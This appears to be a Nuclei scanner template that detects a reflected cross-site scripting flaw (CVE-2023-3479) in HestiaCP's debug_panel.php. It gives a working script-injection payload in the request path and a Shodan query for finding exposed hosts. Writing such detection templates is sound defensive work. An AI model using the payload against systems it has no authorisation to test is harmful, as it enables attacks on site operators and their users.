55 lines
1.6 KiB
YAML
55 lines
1.6 KiB
YAML
id: CVE-2023-3479
|
|
|
|
info:
|
|
name: Hestiacp <= 1.7.8 - Cross-Site Scripting
|
|
author: edoardottt
|
|
severity: medium
|
|
description: |
|
|
Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.
|
|
remediation: |
|
|
Upgrade to the latest version of Hestiacp (1.7.9 or higher) to mitigate this vulnerability.
|
|
reference:
|
|
- https://huntr.dev/bounties/6ac5cf87-6350-4645-8930-8f2876427723/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3479
|
|
- https://github.com/hestiacp/hestiacp/commit/2326aa525a7ba14513af783f29cb5e62a476e67a
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-3479
|
|
cwe-id: CWE-79
|
|
epss-score: 0.0007
|
|
epss-percentile: 0.2917
|
|
cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: hestiacp
|
|
product: control_panel
|
|
shodan-query: http.favicon.hash:-476299640
|
|
tags: huntr,cve,cve2023,hestiacp,xss,intrusive
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}"><script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- debug-panel
|
|
- <script>alert(document.domain)</script>
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100ea63a007cea290edea6391a05295d12d78dcbd430d45d7dd79b098ff68986cef022100861a723efabd5b0f80496b48f0b72793bf99b0baba878fb99cfa61b6d93dba9a:922c64590222798bb761d5b6d8e72950
|